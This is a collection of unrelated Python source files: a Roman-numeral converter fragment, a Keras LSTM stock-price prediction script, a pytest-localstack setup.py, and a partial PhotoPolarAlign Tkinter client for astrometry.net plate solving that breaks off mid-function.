'6' : 'DC', '5' : 'D', '4' : 'CD', '3' : 'CCC', '2' : 'CC', '1' : 'C', '0' : '' }, { '9' : 'XC',
'8' : 'LXXX', '7' : 'LXX', '6' : 'LX', '5' : 'L', '4' : 'XL', '3' : 'XXX', '2' : 'XX', '1' : 'X',
'0' : '' }, { '9' : 'IX', '8' : 'VIII', '7' : 'VII', '6' : 'VI', '5' : 'V', '4' : 'IV', '3' : 'III',
'2' : 'II', '1' : 'I', '0' : '' }]
# Option 1
def number2romannumeral(n):
return ''.join([rnl[x][y] for x, y in zip(range(4), str(n).zfill(4)) if n < 5000 and n > -1])
# Option 2 (reduce must be imported from functools on Python 3)
from functools import reduce
def number2romannumeral(n):
return reduce(lambda x, y: x + y, map(lambda x, y: rnl[x][y], range(4), str(n).zfill(4))) if -1 < n < 5000 else None
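# Worked example (illustrative): for n = 1987, str(n).zfill(4) == '1987', so the digit
# lookups are '1' -> 'M', '9' -> 'CM', '8' -> 'LXXX', '7' -> 'VII', giving 'MCMLXXXVII'.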
|
# -*- coding: utf-8 -*-
"""
Created on Mon Feb 18 22:27:05 2019
@author: Rolikasi
"""
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
from keras.callbacks import EarlyStopping, ReduceLROnPlateau, ModelCheckpoint, TensorBoard
#activate gpu
import tensorflow as tf
sess = tf.Session(config=tf.ConfigProto(log_device_placement=True))
sess
from tensorflow.python.client import device_lib
print(device_lib.list_local_devices())
from keras import backend as K
K.tensorflow_backend._get_available_gpus()
data_2 = pd.read_csv('data/Google_stock_price_2.csv')
data_2.drop(['Date'], axis = 1, inplace = True)
data_2['Volume']= data_2['Volume'].astype(float)
training_set = data_2.iloc[:2227, 0:4].values # Using multiple predictors.
dataset_train = data_2.iloc[:2227, 0:4]
#training_set = training_set.as_matrix() # Using multiple predictors.
#dataset_train = pd.read_csv('data/Google_Stock_Price_Train.csv')
#training_set = dataset_train.iloc[:, 1:2].values
#for RNN use normalization
from sklearn.preprocessing import MinMaxScaler, StandardScaler
sc = StandardScaler()
training_set_scaled = sc.fit_transform(training_set)
sc_predict = StandardScaler()
sc_predict.fit_transform(training_set[:,0:1])
# Creating a data structure with 60 timesteps and 1 output
X_train = []
y_train = []
n_future = 20 # Number of days you want to predict into the future
n_past = 60 # Number of past days you want to use to predict the future
for i in range(n_past, len(training_set_scaled) - n_future + 1):
X_train.append(training_set_scaled[i - n_past:i, 0:4])
y_train.append(training_set_scaled[i+n_future-1:i + n_future, 0])
X_train, y_train = np.array(X_train), np.array(y_train)
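# Illustrative note (column order assumed to be Open/High/Low/Close): each X_train
# sample is a (60, 4) window of scaled values and its label is the scaled first
# column 20 trading days after the window ends, giving
# len(training_set_scaled) - 79 samples in total.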
#Reshaping 3D structure
#X_train = np.reshape(X_train, (X_train.shape[0], X_train.shape[1], 1))
#building the RNN
from keras.models import Sequential
from keras.layers import Dense
from keras.layers import LSTM
from keras.layers import Dropout
regressor = Sequential()
#Adding layers
regressor.add(LSTM(units = 40, return_sequences= True, input_shape = ( n_past, 4)))
regressor.add(Dropout(0.2))
regressor.add(LSTM(units = 40, return_sequences= True))
regressor.add(LSTM(units = 20, return_sequences= False))
regressor.add(Dropout(0.2))
regressor.add(Dense(units = 1))
#compile RNN
regressor.compile(optimizer='adam', loss= 'mean_squared_error')
#fit the RNN to training set
es = EarlyStopping(monitor='val_loss', min_delta=1e-10, patience=17, verbose=1)
rlr = ReduceLROnPlateau(monitor='val_loss', factor=0.5, patience=5, verbose=1)
mcp = ModelCheckpoint(filepath='weights.h5', monitor='val_loss', verbose=1, save_best_only=True, save_weights_only=True)
tb = TensorBoard('logs')
history = regressor.fit(X_train, y_train, epochs=100,
callbacks=[es, rlr,mcp, tb], validation_split=0.2, verbose=1, batch_size=64)
#Predictions
#get real stock price of 2017
#dataset_test = pd.read_csv('data/Google_Stock_Price_Test.csv')
dataset_test = data_2.iloc[2227:, 0:4]
real_stock_price = dataset_test.iloc[:, 0:1].values
#get predictions on 2017
#dataset_total = pd.concat((dataset_train, dataset_test), axis = 0)
data_2 = data_2.iloc[:, 0:4]
inputs = data_2[len(data_2)-len(dataset_test) - n_past:].values
#inputs = inputs.as_matrix()
#inputs = inputs.reshape(-1,1)
inputs_scaled = sc.transform(inputs)
#data_test = dataset_test.values
#data_test_scaled = sc.transform(data_test)
X_test = []
for i in range(n_past, len(inputs)):
X_test.append(inputs_scaled[i-n_past:i, 0:4])
X_test = np.array(X_test)
#X_test = X_test.as_matrix()
#X_test = np.reshape(X_test, (X_test.shape[0], X_test.shape[1], 1))
predicted_stock_price = regressor.predict(X_test)
predicted_stock_price = sc_predict.inverse_transform(predicted_stock_price)
import math
from sklearn.metrics import mean_squared_error
rmse = math.sqrt(mean_squared_error(real_stock_price, predicted_stock_price))
#Visualising the result
plt.plot(real_stock_price, color = 'red', label= 'Real Google Stock Price')
plt.plot(predicted_stock_price, color = 'blue', label = 'Predicted Google Stock Price')
plt.title('Google Stock Price Prediction')
plt.xlabel('Time')
plt.ylabel('Google Stock Price')
plt.legend()
plt.show()
hfm, = plt.plot(sc_predict.inverse_transform(y_train), 'r', label='actual_training_stock_price')
hfm2, = plt.plot(sc_predict.inverse_transform(regressor.predict(X_train)),'b', label = 'predicted_training_stock_price')
plt.legend(handles=[hfm,hfm2])
plt.title('Predictions vs Actual Price')
plt.xlabel('Sample index')
plt.ylabel('Stock Price Training')
plt.savefig('graph_training.png', bbox_inches='tight')
plt.show()
plt.close() |
#!/usr/bin/env python
import io
import os
import sys
from setuptools import find_packages, setup
from setuptools.command.test import test as TestCommand
# Dependencies for this Python library.
REQUIRES = [
"botocore>=1.4.31,!=1.4.45",
'contextlib2; python_version < "3.3"',
"docker",
'mock; python_version < "3.3"',
"pluggy>=0.6.0",
"pytest>=3.3.0", # need caplog (+ warnings for tests)
"six",
]
# Dependencies to run the tests for this Python library.
TEST_REQUIREMENTS = ["boto3", "hypothesis"]
HERE = os.path.dirname(os.path.abspath(__file__))
def setup_package():
with io.open(
os.path.join(HERE, "pytest_localstack", "_version.py"), "r", encoding="utf8"
) as f:
about = {}
exec(f.read(), about)
with io.open(os.path.join(HERE, "README.rst"), "r", encoding="utf8") as f:
readme = f.read()
with io.open(os.path.join(HERE, "CHANGELOG.rst"), "r", encoding="utf8") as f:
changes = f.read()
setup(
name=about["__title__"],
version=about["__version__"],
description=about["__summary__"],
long_description=readme + u"\n\n" + changes,
author=about["__author__"],
author_email=about["__author_email__"],
license="MIT",
url=about["__uri__"],
packages=find_packages(where=HERE, exclude=["tests*"]),
py_modules=["pytest_localstack"],
install_requires=REQUIRES,
tests_require=TEST_REQUIREMENTS,
extras_require={"test": TEST_REQUIREMENTS},
cmdclass={"test": PyTest},
zip_safe=True,
classifiers=[
"Development Status :: 4 - Beta",
"Framework :: Pytest",
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"Operating System :: POSIX",
"Operating System :: Unix",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 2",
"Programming Language :: Python :: 3.4",
"Programming Language :: Python :: 3.5",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3",
"Programming Language :: Python",
"Topic :: Software Development :: Libraries",
"Topic :: Software Development :: Testing",
"Topic :: Utilities",
],
entry_points={"pytest11": ["localstack = pytest_localstack"]},
)
class PyTest(TestCommand):
"""Setup the py.test test runner."""
def finalize_options(self):
"""Set options for the command line."""
TestCommand.finalize_options(self)
self.test_args = []
self.test_suite = True
def run_tests(self):
"""Execute the test runner command."""
import pytest
sys.exit(pytest.main(self.test_args))
if __name__ == "__main__":
setup_package()
|
# -*- coding: utf-8 -*-
"""
Created on Sun Oct 12 22:40:05 2014
@author: Themos Tsikas, Jack Richmond
"""
import sys
import time
class RequestError(Exception):
'''
An exception that happens when talking to the plate solver
'''
pass
def json2python(json):
'''
translates JSON to python
'''
import ujson
try:
return ujson.loads(json)
    except ValueError:
        # not valid JSON; fall through and return None
        pass
return None
def python2json(pyd):
'''
translates python to JSON
'''
import ujson
return ujson.dumps(pyd)
class NovaClient(object):
'''
nova.astrometry.net client
'''
default_url = 'http://nova.astrometry.net/api/'
def __init__(self, apiurl=default_url):
self.session = None
self.apiurl = apiurl
def get_url(self, service):
'''
constructs URL for a plate-solver service
'''
return self.apiurl + service
def send_request(self, service, args={}, file_args=None):
'''
service: string
args: dict
'''
from email.mime.base import MIMEBase
from email.mime.multipart import MIMEMultipart
from email.encoders import encode_noop
from urllib2 import urlopen
from urllib2 import Request
from urllib2 import HTTPError
from urllib import urlencode
from email.mime.application import MIMEApplication
if self.session is not None:
args.update({'session': self.session})
# print 'Python:', (args)
json = python2json(args)
# print 'Sending json:', json
url = self.get_url(service)
print 'Sending to URL:', url
# If we're sending a file, format a multipart/form-data
if file_args is not None:
ma1 = MIMEBase('text', 'plain')
ma1.add_header('Content-disposition',
'form-data; name="request-json"')
ma1.set_payload(json)
ma2 = MIMEApplication(file_args[1], 'octet-stream', encode_noop)
ma2.add_header('Content-disposition',
'form-data; name="file"; filename="%s"'
% file_args[0])
# msg.add_header('Content-Disposition', 'attachment',
# filename='bud.gif')
# msg.add_header('Content-Disposition', 'attachment',
# filename=('iso-8859-1', '', 'FuSballer.ppt'))
mpa = MIMEMultipart('form-data', None, [ma1, ma2])
            # Make a custom generator to format it the way we need.
from cStringIO import StringIO
from email.generator import Generator
class MyGenerator(Generator):
'''
not sure why we need this, copied from nova's example code
'''
def __init__(self, fp, root=True):
Generator.__init__(self, fp, mangle_from_=False,
maxheaderlen=0)
self.root = root
def _write_headers(self, msg):
# We don't want to write the top-level headers;
# they go into Request(headers) instead.
if self.root:
return
# We need to use \r\n line-terminator, but Generator
# doesn't provide the flexibility to override, so we
# have to copy-n-paste-n-modify.
for hoo, voo in msg.items():
print >> self._fp, ('%s: %s\r\n' % (hoo, voo)),
# A blank line always separates headers from body
print >> self._fp, '\r\n',
# The _write_multipart method calls "clone" for the
# subparts. We hijack that, setting root=False
def clone(self, fp):
return MyGenerator(fp, root=False)
fpo = StringIO()
gen = MyGenerator(fpo)
gen.flatten(mpa)
data = fpo.getvalue()
headers = {'Content-type': mpa.get('Content-type')}
else:
# Else send x-www-form-encoded
data = {'request-json': json}
# print 'Sending form data:', data
data = urlencode(data)
# print 'Sending data:', data
headers = {}
request = Request(url=url, headers=headers, data=data)
try:
fle = urlopen(request)
txt = fle.read()
# DEBUG print 'Got json:', txt
result = json2python(txt)
# DEBUG print 'Got result:', result
stat = result.get('status')
# DEBUG print 'Got status:', stat
if stat == 'error':
errstr = result.get('errormessage', '(none)')
raise RequestError('server error message: ' + errstr)
return result
except HTTPError, err:
print 'HTTPError', err
txt = err.read()
open('err.html', 'wb').write(txt)
print 'Wrote error text to err.html'
def login(self, apikey):
'''
Logs us into the plate-solver and gets a session key
'''
import string
args = {'apikey': string.strip(apikey)}
result = self.send_request('login', args)
sess = result.get('session')
print 'Got session:', sess
if not sess:
raise RequestError('no session in result')
self.session = sess
def _get_upload_args(self, **kwargs):
'''
returns the specified solving options
'''
args = {}
lkdt = [('allow_commercial_use', 'd', str),
('allow_modifications', 'd', str),
('publicly_visible', 'y', str),
('scale_units', None, str),
('scale_type', None, str),
('scale_lower', None, float),
('scale_upper', None, float),
('scale_est', None, float),
('scale_err', None, float),
('center_ra', None, float),
('center_dec', None, float),
('radius', None, float),
('downsample_factor', None, int),
('tweak_order', None, int),
('crpix_center', None, bool), ]
for key, default, typ in lkdt:
# image_width, image_height
if key in kwargs:
val = kwargs.pop(key)
val = typ(val)
args.update({key: val})
elif default is not None:
args.update({key: default})
# print 'Upload args:', args
return args
def upload(self, fne, **kwargs):
'''
uploads an image file
'''
args = self._get_upload_args(**kwargs)
try:
fle = open(fne, 'rb')
result = self.send_request('upload', args, (fne, fle.read()))
return result
except IOError:
print 'File %s does not exist' % fne
raise
def myjobs(self):
'''
queries server for our jobs
'''
result = self.send_request('myjobs/')
return result['jobs']
def job_status(self, job_id, justdict=False):
'''
queries server to see if a job is finished
'''
result = self.send_request('jobs/%s' % job_id)
if justdict:
return result
stat = result.get('status')
if stat == 'success':
return stat
return stat
def sub_status(self, sub_id, justdict=False):
'''
queries server for submission status
'''
result = self.send_request('submissions/%s' % sub_id)
if justdict:
return result
return result.get('status')
def jobs_by_tag(self, tag, exact):
'''
        queries the server for jobs associated with a given tag
'''
from urllib import quote
exact_option = 'exact=yes' if exact else ''
result = self.send_request('jobs_by_tag?query=%s&%s'
% (quote(tag.strip()), exact_option), {}, )
return result
def stat_bar(self, txt):
'''
Update the Status bar
'''
self.stat_msg = txt
self.wstat.config(text=self.stat_msg)
self.wstat.update()
def limg2wcs(self, filename, wcsfn, hint):
import os
import time
t_start = time.time()
if (('OSTYPE' in os.environ and os.environ['OSTYPE']=='linux') or
(os.uname()[0]=='Linux') or
('OSTYPE' in os.environ and os.environ['OSTYPE']=='darwin') or
('OS' in os.environ and os.environ['OS'] =='Windows_NT')):
# Cygwin local or Linux local
if True:
# first rough estimate of scale
print '___________________________________________________________'
cmd = 'solve-field -b ' + self.local_configfile.get()
if self.havescale and self.restrict_scale.get()==1:
up_lim = self.scale*1.05
lo_lim = self.scale*0.95
cmd = cmd + (' -u app -L %.2f -H %.2f ' % (lo_lim, up_lim))
else:
cmd = cmd + ' -u ' + self.local_scale_units.get()
cmd = cmd + (' -L %.2f' % self.local_scale_low.get())
cmd = cmd + (' -H %.2f' % self.local_scale_hi.get())
if self.local_downscale.get() != 1:
cmd = cmd + (' -z %d' % self.local_downscale.get())
cmd = cmd + ' ' + self.local_xtra.get()
cmd = cmd + ' -O '
cmd = cmd + ' \\"%s\\"'
template = ((self.local_shell.get() % cmd))
# print template
cmd = (template % filename)
print cmd
os.system(cmd)
self.update_scale(hint)
print '___________________________________________________________'
self.update_solved_labels(hint, 'active')
stat_bar(self, 'Idle')
print 'local solve time ' + str(time.time()-t_start)
print '___________________________________________________________'
def img2wcs(self, ankey, filename, wcsfn, hint):
'''
Plate solves one image
'''
import optparse
import time
from urllib2 import urlopen
t_start = time.time()
parser = optparse.OptionParser()
parser.add_option('--server', dest='server',
default=NovaClient.default_url,
help='Set server base URL (eg, %default)')
parser.add_option('--apikey', '-k', dest='apikey',
                      help='API key for Astrometry.net web service; if not ' +
                      'given, will check the AN_API_KEY environment variable')
parser.add_option('--upload', '-u', dest='upload', help='Upload a file')
parser.add_option('--wait', '-w', dest='wait', action='store_true',
help='After submitting, monitor job status')
parser.add_option('--wcs', dest='wcs',
help='Download resulting wcs.fits file, saving to ' +
                      'given filename; implies --wait if --urlupload or ' +
'--upload')
parser.add_option('--kmz', dest='kmz',
help='Download resulting kmz file, saving to given ' +
'filename; implies --wait if --urlupload or --upload')
parser.add_option('--urlupload', '-U', dest='upload_url',
help='Upload a file at specified url')
parser.add_option('--scale-units', dest='scale_units',
choices=('arcsecperpix', 'arcminwidth', 'degwidth',
'focalmm'),
help='Units for scale estimate')
parser.add_option('--scale-lower', dest='scale_lower', type=float,
help='Scale lower-bound')
parser.add_option('--scale-upper', dest='scale_upper', type=float,
help='Scale upper-bound')
parser.add_option('--scale-est', dest='scale_est', type=float,
help='Scale estimate')
parser.add_option('--scale-err', dest='scale_err', type=float,
                      help='Scale estimate error (in PERCENT), eg "10" if ' +
                      'your estimate can be off by 10%')
parser.add_option('--ra', dest='center_ra', type=float, help='RA center')
parser.add_option('--dec', dest='center_dec', type=float,
help='Dec center')
parser.add_option('--radius', dest='radius', type=float,
help='Search radius around RA,Dec center')
parser.add_option('--downsample', dest='downsample_factor', type=int,
help='Downsample image by this factor')
parser.add_option('--parity', dest='parity', choices=('0', '1'),
help='Parity (flip) of image')
parser.add_option('--tweak-order', dest='tweak_order', type=int,
help='SIP distortion order (default: 2)')
parser.add_option('--crpix-center', dest='crpix_center',
action='store_true', default=None,
help='Set reference point to center of image?')
parser.add_option('--sdss', dest='sdss_wcs', nargs=2,
help='Plot SDSS image for the given WCS file; write ' +
'plot to given PNG filename')
parser.add_option('--galex', dest='galex_wcs', nargs=2,
                      help='Plot GALEX image for the given WCS file; write ' +
'plot to given PNG filename')
parser.add_option('--substatus', '-s', dest='sub_id',
help='Get status of a submission')
parser.add_option('--jobstatus', '-j', dest='job_id',
help='Get status of a job')
parser.add_option('--jobs', '-J', dest='myjobs', action='store_true',
help='Get all my jobs')
parser.add_option('--jobsbyexacttag', '-T', dest='jobs_by_exact_tag',
                      help='Get a list of jobs associated with a given ' +
'tag--exact match')
parser.add_option('--jobsbytag', '-t', dest='jobs_by_tag',
help='Get a list of jobs associated with a given tag')
parser.add_option('--private', '-p', dest='public', action='store_const',
const='n', default='y',
help='Hide this submission from other users')
parser.add_option('--allow_mod_sa', '-m', dest='allow_mod',
action='store_const', const='sa', default='d',
help='Select license to allow derivative works of ' +
'submission, but only if shared under same conditions ' +
'of original license')
parser.add_option('--no_mod', '-M', dest='allow_mod', action='store_const',
const='n', default='d',
help='Select license to disallow derivative works of ' +
'submission')
parser.add_option('--no_commercial', '-c', dest='allow_commercial',
action='store_const', const='n', default='d',
help='Select license to disallow commercial use of' +
' submission')
# load opt with defaults, as above
    opt, args = parser.parse_args([])
# add given arguments
opt.wcs = wcsfn
opt.apikey = ankey
opt.upload = filename
if self.havescale and self.restrict_scale.get() == 1:
opt.scale_units = 'arcsecperpix'
opt.scale_est = ('%.2f' % self.scale)
opt.scale_err = 5
# DEBUG print opt
print 'with estimated scale', opt.scale_est
args = {}
args['apiurl'] = opt.server
clnt = NovaClient(**args)
try:
clnt.login(opt.apikey)
    except (RequestError, URLError):
stat_bar(self, ("Couldn't log on to nova.astrometry.net " +
'- Check the API key'))
return
if opt.upload or opt.upload_url:
if opt.wcs or opt.kmz:
opt.wait = True
kwargs = dict()
if opt.scale_lower and opt.scale_upper:
kwargs.update(scale_lower=opt.scale_lower,
scale_upper=opt.scale_upper,
scale_type='ul')
elif opt.scale_est and opt.scale_err:
kwargs.update(scale_est=opt.scale_est,
scale_err=opt.scale_err,
scale_type='ev')
elif opt.scale_lower or opt.scale_upper:
kwargs.update(scale_type='ul')
if opt.scale_lower:
kwargs.update(scale_lower=opt.scale_lower)
if opt.scale_upper:
kwargs.update(scale_upper=opt.scale_upper)
for key in ['scale_units', 'center_ra', 'center_dec', 'radius',
'downsample_factor', 'tweak_order', 'crpix_center', ]:
if getattr(opt, key) is not None:
kwargs[key] = getattr(opt, key)
if opt.parity is not None:
kwargs.update(parity=int(opt.parity))
if opt.upload:
upres = clnt.upload(opt.upload, **kwargs)
stat = upres['status']
if stat != 'success':
print 'Upload failed: status', stat
print upres
sys.exit(-1)
opt.sub_id = upres['subid']
if opt.wait:
if opt.job_id is None:
if opt.sub_id is None:
print "Can't --wait without a submission id or job id!"
sys.exit(-1)
while True:
stat = clnt.sub_status(opt.sub_id, justdict=True)
# print 'Got status:', stat
jobs = stat.get('jobs', [])
if len(jobs):
for j in jobs:
if j is not None:
break
if j is not None:
print 'Selecting job id', j
opt.job_id = j
break
time.sleep(5)
success = False
while True:
stat = clnt.job_status(opt.job_id, justdict=True)
# print 'Got job status:', stat
# TODO : stat may be None! should recover
if stat.get('status', '') in ['success']:
success = (stat['status'] == 'success')
break
time.sleep(5)
if success:
clnt.job_status(opt.job_id)
retrieveurls = []
if opt.wcs:
# We don't need the API for this, just construct URL
url = opt.server.replace('/api/', '/wcs_file/%i' % opt.job_id)
retrieveurls.append((url, opt.wcs))
for url, fne in retrieveurls:
print 'Retrieving file from', url
fle = urlopen(url)
txt = fle.read()
wfl = open(fne, 'wb')
wfl.write(txt)
wfl.close()
print 'Wrote to', fne
self.update_solved_labels(hint, 'active')
stat_bar(self,'Idle')
print 'nova solve time ' + str(time.time()-t_start)
print '___________________________________________________________'
opt.job_id = None
opt.sub_id = None
if opt.sub_id:
print clnt.sub_status(opt.sub_id)
if opt.job_id:
print clnt.job_status(opt.job_id)
if opt.jobs_by_tag:
tag = opt.jobs_by_tag
print clnt.jobs_by_tag(tag, None)
if opt.jobs_by_exact_tag:
tag = opt.jobs_by_exact_tag
print clnt.jobs_by_tag(tag, 'yes')
if opt.myjobs:
jobs = clnt.myjobs()
print jobs
from Tkinter import Frame, Tk, Menu, Label, Entry, PhotoImage
from Tkinter import Scrollbar, Toplevel, Canvas, Radiobutton
from Tkinter import StringVar, IntVar, DoubleVar
from Tkinter import Button, LabelFrame, Checkbutton, Scale
from Tkinter import HORIZONTAL
def help_f():
'''
Our help window
'''
import tkMessageBox
tkMessageBox.showinfo("Help", "Still to come...")
def about_f():
'''
our about window
'''
import tkMessageBox
tkMessageBox.showinfo('About',
'PhotoPolarAlign v1.0.4 \n' +
'Copyright © 2014 Themos Tsikas, ' +
'Jack Richmond')
def scale_frm_wcs(fn):
from astropy.io import fits
hdu = fits.open(fn)
head = hdu[0].header
return scale_frm_header(head)
def parity_frm_header(head):
    '''
    look in the plate-solution header for the parity information
    '''
    try:
        # nova's wcs files have the parity in the comments
        comments = head['COMMENT']
        size = (len(comments))
        for i in range(0, size):
            if comments[i][0:6] == 'parity':
                tkns = comments[i].split(' ')
                return int(tkns[1])
    except KeyError:
        return 1
    # no parity comment found - fall back to the same default as a missing key
    return 1
def scale_frm_header(head):
'''
look in the plate-solution header for the scale information
'''
try:
# nova's wcs files have the scale in the comments
comments = head['COMMENT']
size = (len(comments))
for i in range(0, size):
if comments[i][0:5] == 'scale':
tkns = comments[i].split(' ')
return float(tkns[1])
except KeyError:
try:
# AstroArt's wcs files have it CDELT1 (deg/pixel)
cdelt1 = abs(head['CDELT1'])
return float(cdelt1)*60.0*60.0
except KeyError:
return 1.0
def dec_frm_header(head):
'''
look in header for width and height of image
'''
# nova's and AstroArt's wcs files have CRVAL2
dec = head['CRVAL2']
return dec
def wid_hei_frm_header(head):
'''
look in header for width and height of image
'''
try:
# nova's wcs files have IMAGEW / IMAGEH
width = head['IMAGEW']
height = head['IMAGEH']
return width, height
except KeyError:
try:
# AstroArt's fits files have NAXIS1 / NAXIS2
width = head['NAXIS1']
height = head['NAXIS2']
return width, height
except KeyError:
return 0, 0
def decdeg2dms(dd):
    '''
    convert decimal degrees to a (degrees, minutes, seconds) tuple
    '''
    mnt,sec = divmod(dd*3600,60)
    deg,mnt = divmod(mnt,60)
    return deg,mnt,sec
def cross(crd, img, colour):
'''
Annotate with a cross for the RA axis
'''
from PIL import ImageDraw
draw = ImageDraw.Draw(img)
coords = crd[0]
ax1 = coords[0]
ay1 = coords[1]
draw.line((ax1 - 30, ay1 - 30) + (ax1 + 30, ay1 + 30),
fill=colour, width=3)
draw.line((ax1 + 30, ay1 - 30) + (ax1 - 30, ay1 + 30),
fill=colour, width=3)
def circle(centre, img, colour, name):
'''
Annotate with a circle
'''
from PIL import ImageFont, ImageDraw
font = ImageFont.load('symb24.pil')
draw = ImageDraw.Draw(img)
cen = centre[0]
ax1 = cen[0]
ay1 = cen[1]
draw.ellipse((ax1 - 20, ay1 - 20, ax1 + 20, ay1 + 20),
fill=None, outline=colour)
draw.text((ax1 + 30, ay1), name, fill=colour, font=font)
def cpcircle(centre, img, scl):
'''
Annotate with target circles
'''
from PIL import ImageFont, ImageDraw
font = ImageFont.load('helvR24.pil')
draw = ImageDraw.Draw(img)
cen = centre[0]
ax1 = cen[0]
ay1 = cen[1]
number = [5, 10, 20, 40]
for i in number:
rad = (i*60)/scl
draw.ellipse((ax1 - rad, ay1 - rad, ax1 + rad, ay1 + rad),
fill=None, outline='Green')
draw.text((ax1 + (rad*26)/36, ay1 + (rad*26/36)), str(i),
font=font)
draw.line((ax1 - 30, ay1) + (ax1 - 4, ay1), fill='Green', width=2)
draw.line((ax1 +4, ay1) + (ax1 + 30, ay1), fill='Green', width=2)
draw.line((ax1, ay1 - 30) + (ax1, ay1 - 4),fill='Green', width=2)
draw.line((ax1, ay1 + 4) + (ax1, ay1 + 30),fill='Green', width=2)
class PhotoPolarAlign(Frame):
'''
Our application as a class
'''
def write_config_file(self):
'''
Update the user preferences file
'''
# the API key
if not self.config.has_section('nova'):
self.config.add_section('nova')
self.config.set('nova', 'apikey', self.apikey.get())
# the image directory
if not self.config.has_section('file'):
self.config.add_section('file')
self.config.set('file', 'imgdir', self.imgdir)
# the geometry
if not self.config.has_section('appearance'):
self.config.add_section('appearance')
self.config.set('appearance', 'geometry',
self.myparent.winfo_geometry())
# the operating options
if not self.config.has_section('operations'):
self.config.add_section('operations')
self.config.set('operations','restrict scale',
self.restrict_scale.get())
# the local solve options
if not self.config.has_section('local'):
self.config.add_section('local')
self.config.set('local','shell',
self.local_shell.get())
self.config.set('local','downscale',
self.local_downscale.get())
self.config.set('local','configfile',
self.local_configfile.get())
self.config.set('local','scale_units',
self.local_scale_units.get())
self.config.set('local','scale_low',
self.local_scale_low.get())
self.config.set('local','scale_hi',
self.local_scale_hi.get())
self.config.set('local','xtra',
self.local_xtra.get())
#
with open(self.cfgfn, 'w') as cfgfile:
self.config.write(cfgfile)
cfgfile.close()
def settings_destroy(self):
'''
User asked to close the Settings
'''
self.write_config_file()
self.wvar4.configure(text=('%.3s...........' % self.apikey.get()))
self.settings_win.destroy()
def settings_open(self):
'''
Our Settings window
'''
# create child window
win = Toplevel()
self.settings_win = win
win.geometry('480x600')
win.title('Settings')
# get the API key information
frm = LabelFrame(win, borderwidth=2, relief='ridge', text='nova.astrometry.net')
frm.pack(side='top', ipadx=20, padx=20, fill='x')
nxt = Label(frm, text='API Key')
nxt.grid(row=0, column=0, pady=4, sticky='w')
nxt = Entry(frm, textvariable=self.apikey)
nxt.grid(row=0, column=1, pady=4)
nxt = Label(frm, text='Restrict scale')
nxt.grid(row=1, column=0, pady=4, sticky='w')
nxt = Checkbutton(frm, var=self.restrict_scale)
nxt.grid(row=1, column=1, pady=4)
frm = LabelFrame(win, borderwidth=2, relief='ridge', text='Local solver Configuration')
frm.pack(side='top', ipadx=20, padx=20, fill='x')
nxt = Label(frm, text='shell')
nxt.grid(row=0, column=0, pady=4, sticky='w')
nxt = Entry(frm, textvariable=self.local_shell,width=0)
nxt.grid(row=0, column=1, pady=4, sticky='we', columnspan=2)
ifrm = Frame(frm,bd=0)
ifrm.grid(row=1, column=0, pady=4, sticky='w', columnspan=3)
nxt = Label(ifrm, text='downscale')
nxt.pack(side='left')
nxt = Radiobutton(ifrm, variable=self.local_downscale,value='1',text='1')
nxt.pack(side='left')
nxt = Radiobutton(ifrm, variable=self.local_downscale,value='2',text='2')
nxt.pack(side='left')
nxt = Radiobutton(ifrm, variable=self.local_downscale,value='4',text='4')
nxt.pack(side='left')
nxt = Label(frm, text='configfile')
nxt.grid(row=2, column=0, pady=4, sticky='w')
nxt = Entry(frm, textvariable=self.local_configfile, width=0)
nxt.grid(row=2, column=1, pady=4,sticky='we', columnspan=2)
ifrm = Frame(frm,bd=0)
ifrm.grid(row=3, column=0, pady=4, sticky='w', columnspan=3)
nxt = Label(ifrm, text='scale_units')
nxt.pack(side='left')
nxt = Radiobutton(ifrm, variable=self.local_scale_units,value='arcsecperpix',text='arcsec/pix')
nxt.pack(side='left')
nxt = Radiobutton(ifrm, variable=self.local_scale_units,value='degwidth',text='degrees width')
nxt.pack(side='left')
nxt = Radiobutton(ifrm, variable=self.local_scale_units,value='arcminwidth',text='arcminutes width')
nxt.pack(side='left')
nxt = Label(frm, text='scale_low')
nxt.grid(row=4, column=0, pady=4, sticky='w')
nxt = Scale(frm, from_=0, to_=40, orient=HORIZONTAL,
variable=self.local_scale_low, showvalue=0, digits=4,
sliderlength=10, length=300, resolution=0.1)
nxt.grid(row=4, column=1, pady=4)
nxt = Entry(frm, textvariable=self.local_scale_low, width=8)
nxt.grid(row=4, column=2, pady=4)
nxt = Label(frm, text='scale_hi')
nxt.grid(row=5, column=0, pady=4, sticky='w')
nxt = Scale(frm, from_=0, to_=120, orient=HORIZONTAL,
variable=self.local_scale_hi, showvalue=0, digits=4,
sliderlength=10, length=300, resolution=0.1)
nxt.grid(row=5, column=1, pady=4)
nxt = Entry(frm, textvariable=self.local_scale_hi, width=8)
nxt.grid(row=5, column=2, pady=4)
nxt = Label(frm, text='extra')
nxt.grid(row=6, column=0, pady=4, sticky='w')
nxt = Entry(frm, textvariable=self.local_xtra, width=40)
nxt.grid(row=6, column=1, pady=4, sticky='we', columnspan=2)
nxt = Button(frm, text='Read from AstroTortilla configuration',
command=self.slurpAT)
nxt.grid(row=7, column=0, pady=4, sticky='we', columnspan=3)
Button(win, text='OK', command=self.settings_destroy).pack(pady=4)
def quit_method(self):
'''
User wants to quit
'''
self.write_config_file()
self.myparent.destroy()
def happy_with(self, wcs, img):
'''
check that .wcs (wcs) is compatible with .jpg (img)
'''
import os
from os.path import exists
if exists(wcs):
# DBG print wcs, 'exists'
# check timestamps
# DBG print os.stat(wcs).st_atime, os.stat(wcs).st_mtime, os.stat(wcs).st_ctime, 'wcs'
# DBG print os.stat(img).st_atime, os.stat(img).st_mtime, os.stat(img).st_ctime, 'img'
if os.stat(wcs).st_mtime> os.stat(img).st_mtime:
return True
return False
def get_file(self, hint):
'''
User wants to select an image file
'''
import tkFileDialog
from os.path import splitext, dirname, basename
options = {}
options['filetypes'] = [('JPEG files', '.jpg .jpeg .JPG .JPEG'),
('all files', '.*')]
options['initialdir'] = self.imgdir
titles = {}
titles['v'] = 'The vertical image of the Celestial Pole region'
titles['h'] = 'The horizontal image of the Celestial Pole region'
titles['i'] = 'The horizontal image after Alt/Az adjustment'
options['title'] = titles[hint]
img = tkFileDialog.askopenfilename(**options)
if img:
wcs = splitext(img)[0] + '.wcs'
if self.happy_with(wcs, img):
self.update_solved_labels(hint, 'active')
else:
self.update_solved_labels(hint, 'disabled')
self.imgdir = dirname(img)
if hint == 'v':
self.vimg_fn = img
self.vwcs_fn = wcs
self.havev = True
